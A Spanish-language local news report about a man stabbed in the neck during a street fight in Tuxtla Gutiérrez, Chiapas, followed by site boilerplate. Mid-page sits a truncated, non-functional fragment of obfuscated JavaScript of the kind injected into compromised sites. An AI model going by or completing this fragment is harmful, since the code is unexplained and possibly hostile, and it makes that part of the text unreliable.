Navajean a joven en riña ocurrida en la Calzada al Sumidero

Jairo Camacho.

Agencia ReporteCiudadano, 20 de abril del 2023. Tuxtla Gutiérrez.- Un joven de 25 años de edad fue herido de un navajazo en el cuello, luego de participar en una riña este jueves por la noche en la Calzada al Sumidero de Tuxtla Gutiérrez.

Los reportes oficiales informaron que, todo ocurrió a la altura de la 17 Norte, cuando por motivos desconocidos un grupo de sujetos comenzó a golpearse.

Durante la riña, uno de los participantes sacó una navaja y le asestó un golpe a su contrincante en la garganta y escapó corriendo.

Al lugar arribaron paramédicos de la Cruz Roja para atender al herido que presentó sangrado abundante pero no quiso ser trasladado a un nosocomio.

Elementos de la policía tomaron datos de lo acontecido y aconsejaron a la víctima Interponer la denuncia correspondiente.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Fuerte choque en la autopista San Cristóbal-Tuxtla deja lesionados y cierre parcial de la circulación

Yolanda Rodríguez/ corresponsal 30 de junio del 2026. SCLC.- Un fuerte accidente de tránsito registrado …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *